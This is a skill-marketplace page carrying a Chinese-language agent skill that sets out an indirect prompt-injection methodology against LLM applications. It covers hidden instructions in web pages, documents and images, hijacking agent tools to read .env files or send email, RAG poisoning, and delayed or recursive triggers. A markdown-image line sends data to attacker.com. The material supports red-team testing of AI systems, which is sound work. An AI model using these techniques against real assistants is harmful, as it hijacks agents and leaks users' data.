Adoption

Agent Skills are supported by leading AI development tools.

VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory VS Code Gemini CLI GitHub Goose Amp Cursor Claude Code Letta OpenCode Claude OpenAI Codex Factory

wgpsec/prompt-injection

Name: prompt-injection
Author: wgpsec

skills/ai-security/prompt-injection/SKILL.md

npx skillsauth add wgpsec/AboutSecurity prompt-injection

Clean

TrivyContainer and dependency vulnerability scanner

Clean

SemgrepStatic code analysis for vulnerabilities

Clean

mcp-scan (Snyk)Model Context Protocol security validation

Skipped

Snyk (dep)Open source security scanning

Skipped

Socket.devSupply chain security analysis

Skipped

VirusTotalMulti-engine malware detection

Skipped

CrowdStrikeAdvanced threat intelligence

Skipped

OSV-ScannerOpen Source Vulnerability database check

Skipped

OWASP Dep-Check

AI Prompt 间接注入方法论

概述

Prompt Injection（提示注入）是指攻击者通过 AI 系统处理的外部数据源，注入恶意指令来操控模型行为。与 jailbreak（用户直接输入）不同，injection 利用不受信任的第三方数据作为攻击载体，模型无法区分"数据"和"指令"。

这是 LLM 应用最危险的漏洞类别 — OWASP LLM Top 10 的 #1 位。

深入参考

各 Phase 详细 Payload 与代码（网页/文档/CSV/图片/工具链/RAG/数据外泄/高级技术） → references/injection-payloads.md

攻击面分类

| 注入渠道 | 载体 | 危害等级 | |----------|------|----------| | 网页内容 | AI 浏览/搜索时读取恶意页面 | Critical | | 文档上传 | PDF/Word/CSV 中嵌入隐藏指令 | Critical | | 邮件内容 | AI 邮件助手处理恶意邮件 | Critical | | 数据库/RAG | 知识库中投毒的文档 | Critical | | API 返回 | AI Agent 调用的 API 返回恶意内容 | High | | 用户评论/表单 | AI 分析用户生成内容时触发 | High | | 图片 OCR | 图片中包含隐藏文本指令 | High | | 代码注释 | AI 代码助手读取恶意注释 | High |

方法论概览

Phase 1: 间接注入 — 网页/文档载体

网页隐藏指令: CSS 隐藏元素/HTML 注释中嵌入 AI 可读指令
文档注入: PDF/Word 白色字体隐藏指令、PDF 元数据注入
CSV/数据注入: 在数据字段中嵌入恶意指令
图片注入（多模态）: 极浅颜色文字（人看不见，AI 可读）

Phase 2: 工具链劫持 (Tool Use Abuse)

工具调用注入: 通过外部数据让 Agent 调用 read_file/http_request 等危险工具
跨工具链攻击: 搜索工具返回恶意内容 → 触发邮件工具发送数据
文件系统 Agent 攻击: 代码仓库 README 中注入 → AI 代码助手读取 .env

Phase 3: RAG 投毒

知识库投毒: 在正常文档中夹带恶意指令（白色字体/特殊标记）
对抗性检索: 构造高频关键词文本确保被检索命中
元数据层注入: 在文档 metadata 中注入覆盖指令

Phase 4: 数据外泄

Markdown 图片外泄: 让 AI 输出包含 ![](https://attacker.com/log?data=...) 的 markdown
链接外泄: 伪装为"更多信息"链接，URL 参数携带敏感数据
隐蔽编码外泄: 用首字母拼写等方式隐蔽泄露

Phase 5: 高级注入技术

Payload Splitting: 恶意指令分散到多个数据源，单独无害组合有害
延迟触发: 嵌入条件触发器，特定查询时激活
递归注入: 让 AI 输出中嵌入新的注入 payload，链式传播

所有技术的详细 payload 和代码见 references/injection-payloads.md

实战检测清单

1. [ ] 目标 AI 应用是否处理外部数据？（网页、文档、邮件、API）
2. [ ] 是否有工具调用/插件能力？（文件操作、网络请求、代码执行）
3. [ ] 是否使用 RAG/知识库？（可投毒的向量数据库）
4. [ ] 输出是否渲染 Markdown？（图片/链接外泄风险）
5. [ ] 是否有多步骤工作流？（跨步骤注入机会）
6. [ ] 数据输入是否经过消毒？（HTML 标签、元数据是否保留）
7. [ ] 是否区分数据和指令？（系统/用户/上下文分离）

参考资源

OWASP LLM Top 10 — LLM01: Prompt Injection
Not what you've signed up for: Compromising Real-World LLM-Integrated Applications
Indirect Prompt Injection via YouTube Transcripts
Prompt Injection in LangChain Agents
Markdown Image Exfiltration in ChatGPT Plugins
Google Bard Indirect Injection via Google Docs

wgpsec/prompt-injection

skills/ai-security/prompt-injection/SKILL.md

AI/LLM 间接 Prompt 注入攻击。当目标 AI 系统会处理外部数据源（网页、文档、邮件、数据库、API 返回）时使用。覆盖间接注入、工具链劫持、RAG 投毒、数据外泄等技术。OWASP LLM Top 10 #1 漏洞类别

1,185 stars

development

Updated Apr 24, 2026

$ install --global

skillsauth

npx skillsauth add wgpsec/AboutSecurity prompt-injection

Install this skill globally with one command. Works with Claude Code, Cursor, and Windsurf.

Security Scan Results

3 of 9 scanners reported clean

Some scanners were skipped, did not run, or reported a non-clean status. Review each row below.

Scanners Passed

Scanners in report

Clean

TrivyContainer and dependency vulnerability scanner

95%

Clean

SemgrepStatic code analysis for vulnerabilities

95%

Clean

mcp-scan (Snyk)Model Context Protocol security validation

95%

Skipped

Snyk (dep)Open source security scanning

50%

Skipped

Socket.devSupply chain security analysis

50%

Skipped

VirusTotalMulti-engine malware detection

50%

Skipped

CrowdStrikeAdvanced threat intelligence

50%

Skipped

OSV-ScannerOpen Source Vulnerability database check

50%

Skipped

OWASP Dep-Check

50%

Last scanned: Apr 24, 2026, 5:30 AM10.5s2 files scanned

SKILL.md

name:: prompt-injection
description:: AI/LLM 间接 Prompt 注入攻击。当目标 AI 系统会处理外部数据源（网页、文档、邮件、数据库、API 返回）时使用。覆盖间接注入、工具链劫持、RAG 投毒、数据外泄等技术。OWASP LLM Top 10 #1 漏洞类别
tags:: ai,llm,prompt-injection,间接注入,RAG,投毒,工具调用,数据外泄,AI安全,Agent,插件
category:: ai-security

AI Prompt 间接注入方法论

概述

这是 LLM 应用最危险的漏洞类别 — OWASP LLM Top 10 的 #1 位。

深入参考

各 Phase 详细 Payload 与代码（网页/文档/CSV/图片/工具链/RAG/数据外泄/高级技术） → references/injection-payloads.md

攻击面分类

方法论概览

Phase 1: 间接注入 — 网页/文档载体

网页隐藏指令: CSS 隐藏元素/HTML 注释中嵌入 AI 可读指令
文档注入: PDF/Word 白色字体隐藏指令、PDF 元数据注入
CSV/数据注入: 在数据字段中嵌入恶意指令
图片注入（多模态）: 极浅颜色文字（人看不见，AI 可读）

Phase 2: 工具链劫持 (Tool Use Abuse)

工具调用注入: 通过外部数据让 Agent 调用 read_file/http_request 等危险工具
跨工具链攻击: 搜索工具返回恶意内容 → 触发邮件工具发送数据
文件系统 Agent 攻击: 代码仓库 README 中注入 → AI 代码助手读取 .env

Phase 3: RAG 投毒

知识库投毒: 在正常文档中夹带恶意指令（白色字体/特殊标记）
对抗性检索: 构造高频关键词文本确保被检索命中
元数据层注入: 在文档 metadata 中注入覆盖指令

Phase 4: 数据外泄

Markdown 图片外泄: 让 AI 输出包含 ![](https://attacker.com/log?data=...) 的 markdown
链接外泄: 伪装为"更多信息"链接，URL 参数携带敏感数据
隐蔽编码外泄: 用首字母拼写等方式隐蔽泄露

Phase 5: 高级注入技术

Payload Splitting: 恶意指令分散到多个数据源，单独无害组合有害
延迟触发: 嵌入条件触发器，特定查询时激活
递归注入: 让 AI 输出中嵌入新的注入 payload，链式传播

所有技术的详细 payload 和代码见 references/injection-payloads.md

实战检测清单

1. [ ] 目标 AI 应用是否处理外部数据？（网页、文档、邮件、API）
2. [ ] 是否有工具调用/插件能力？（文件操作、网络请求、代码执行）
3. [ ] 是否使用 RAG/知识库？（可投毒的向量数据库）
4. [ ] 输出是否渲染 Markdown？（图片/链接外泄风险）
5. [ ] 是否有多步骤工作流？（跨步骤注入机会）
6. [ ] 数据输入是否经过消毒？（HTML 标签、元数据是否保留）
7. [ ] 是否区分数据和指令？（系统/用户/上下文分离）

参考资源

OWASP LLM Top 10 — LLM01: Prompt Injection
Not what you've signed up for: Compromising Real-World LLM-Integrated Applications
Indirect Prompt Injection via YouTube Transcripts
Prompt Injection in LangChain Agents
Markdown Image Exfiltration in ChatGPT Plugins
Google Bard Indirect Injection via Google Docs

Related Skills

wgpsec/azure-pentesting

testing

VerifiedTrustedCommunity

Azure 云环境渗透测试总体方法论。当目标使用 Azure/Microsoft 365/Entra ID、发现 Azure 相关资产（Blob Storage/App Service/Azure VM/Azure Functions）、获取 Azure 凭据（Service Principal/Managed Identity/Access Token）、或需要对 Azure 环境进行安全评估时使用。提供从未授权枚举到 Entra ID 攻击、服务提权、Cloud-to-OnPrem 横向移动的全流程决策树。覆盖 35+ Azure 服务攻击面

1,393SKILL.mdUpdated Apr 24, 2026

wgpsec/azure-pentesting

wgpsec/mythic-c2

tools

VerifiedTrustedCommunity

Mythic C2 操作方法论。当需要部署 Mythic、选择 Mythic Agent、安装 C2 Profile、配置 HTTP/DNS/WebSocket/SMB/TCP 通信、生成 payload、管理回连任务，或把 Mythic 作为跨平台 C2 框架用于授权红队演练时使用。覆盖 mythic-cli 安装、Agent/Profile 选择、SSL 证书配置、payload 构建和基础 OPSEC 判断

1,345SKILL.mdUpdated May 22, 2026

wgpsec/docker-pentesting

development

VerifiedTrustedCommunity

Docker 安全测试与容器渗透方法论。当需要评估 Docker 容器、Docker Daemon、Docker Registry、镜像层、构建产物或容器逃逸风险时使用。覆盖容器环境识别、特权容器逃逸、docker.sock/Remote API 利用、procfs/cgroup/capabilities 滥用、Docker 用户组提权、运行时/内核 CVE、Registry 枚举、镜像层 Secret 分析和构建上下文泄露。发现 Docker 容器环境、Registry 暴露、镜像凭据或容器配置错误时应使用此技能

1,345SKILL.mdUpdated May 22, 2026

wgpsec/docker-pentesting

wgpsec/padbuster-padding-oracle

development

VerifiedTrustedCommunity

使用 PadBuster 进行 Padding Oracle 攻击。当发现 Web 应用使用 CBC 模式加密且存在 Padding Oracle 漏洞时使用。PadBuster 可自动解密密文和伪造任意明文对应的合法密文，适用于加密 Cookie/Token/URL 参数。任何涉及 Padding Oracle 攻击、CBC 密文解密、Cookie 伪造的场景都应使用此技能

1,345SKILL.mdUpdated May 6, 2026

wgpsec/padbuster-padding-oracle

Download

For Claude Desktop. Download once, then upload the file in the app — no terminal needed.

Need help? View full Cowork setup guide →

Install manually

Choose your platform

# Clone the repo
git clone https://github.com/wgpsec/AboutSecurity.git

# Copy into Claude Code skills folder (global)
cp -r AboutSecurity/skills/ai-security/prompt-injection ~/.claude/skills/

Claude Code Skills — official skills path docs.

Repository

wgpsec/AboutSecurity

1,185 stars

Compatible with

Claude Code

OpenAI Codex CLI

ChatGPT